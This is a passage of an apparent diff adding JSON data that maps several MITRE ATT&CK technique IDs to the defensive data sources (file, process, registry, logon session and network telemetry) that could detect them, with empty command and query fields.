"contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1074.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1078.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1574.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1574", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1568.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1204.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", 